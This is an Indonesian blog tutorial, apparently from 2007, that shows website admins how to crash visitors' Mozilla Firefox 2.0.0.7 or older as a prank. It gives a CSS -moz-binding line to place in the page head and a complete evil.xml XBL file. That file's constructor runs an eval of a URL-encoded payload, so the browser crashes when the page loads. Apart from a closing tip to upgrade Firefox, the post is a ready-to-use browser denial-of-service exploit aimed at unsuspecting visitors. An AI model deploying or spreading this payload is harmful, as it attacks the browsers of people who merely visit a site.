Mengerjai Pengunjung Situs Pengguna Mozilla Firefox V2.0.0.7 Kebawah


  • SPYRO KiD
  • admin[~@t~]spyrozone[~d.t~]net
  • Friday, November 16th, 2007
  • CopyLEFT (c) 2011++ www.spyrozone.net All Rights Reserved


Pengen ngerjai pengunjung? hehehe.. emangnya cuma pengunjung ajah yang bisa iseng, para admin jangan kalah iseng doong ;p Dengan beberapa script sederhana, anda bisa membuat Browser pengunjung anda mengalami crash. Target kita kali ini adalah para pengguna Mozilla Firefox V.2.0.0.7 kebawah.

Langkah 1

Salin script berikut dan letakkan diantara tag <HEAD> halaman situs anda:

<style>BODY{-moz-binding:url("evil.xml#xss")}</style>

Misalnya:

<html>
<head><style>BODY{-moz-binding:url("evil.xml#xss")}</style>
<title>Judul halaman</title>
</head>
<body>Isi halaman situs anda...</body>
</html>

Langkah 2

Salin script berikut, simpan dengan nama evil.xml dan  uploadlah  di  directory yang sama dengan halaman yang disisipi script di langkah pertama tadi.

<?xml version="1.0"?><bindings xmlns="http://www.mozilla.org/xbl"><binding id="xss"><implementation><constructor><![CDATA[eval(unescape('%64%6f%63%75%6d%65%6e%74%2e%77%72%69%74%65%28%27%3c%61%3e%27%29')); ]]></constructor></implementation></binding></bindings>

Cobalah akses halaman jebakan tadi menggunakan Mozilla Firefox V 2.0.0.7 kebawah. Browser anda akan mengalami Crash ^_^. Agar anda tidak mengalami nasib serupa, download ajah versi terbaru Mozilla Firefox.

Selamat mencoba.. ;)


//E.O.F